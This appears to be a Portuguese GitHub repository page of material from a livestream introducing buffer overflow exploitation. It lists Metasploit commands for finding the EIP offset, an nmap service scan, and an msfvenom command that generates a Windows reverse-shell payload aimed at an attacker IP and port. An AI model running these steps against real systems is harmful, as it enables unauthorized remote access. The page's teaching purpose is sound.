Skip to content

Material utilizado na Live sobre Buffer Overflow

Notifications You must be signed in to change notification settings

5l1v3r1/live_bufferoverflow

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Live - Buffer Overflow, uma introdução ao assunto

Link do Youtube

Para quem perdeu a Live, segue o link do vídeo gravado do YouTube

https://youtu.be/oGZ01rvbfwE

Tabela ASCII

Char  Dec  Oct  Hex   Linux
(nl)   10 0012  x0a   \n
(cr)   13 0015  x0d   \r
A      65 0101  x41
B      66 0102  x42
C      67 0103  x43

Comandos utilizados

Gerando texto único para identificação da posição do EIP

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700

Checando a posição (offset) do EIP

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438

Conectando no rdesktop

rdesktop -u usuario -p senha -g 65% -x m endereco

Buscando informações do serviço

nmap -Pn -p21 -A 192.168.15.150

Gerando payload do shell reverso

msfvenom -p windows/shell_reverse_tcp LHOST=IP_atacante LPORT=Porta_atacante -b "\x00\x0a\x0d\x40" -a x86 -f python

About

Material utilizado na Live sobre Buffer Overflow

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%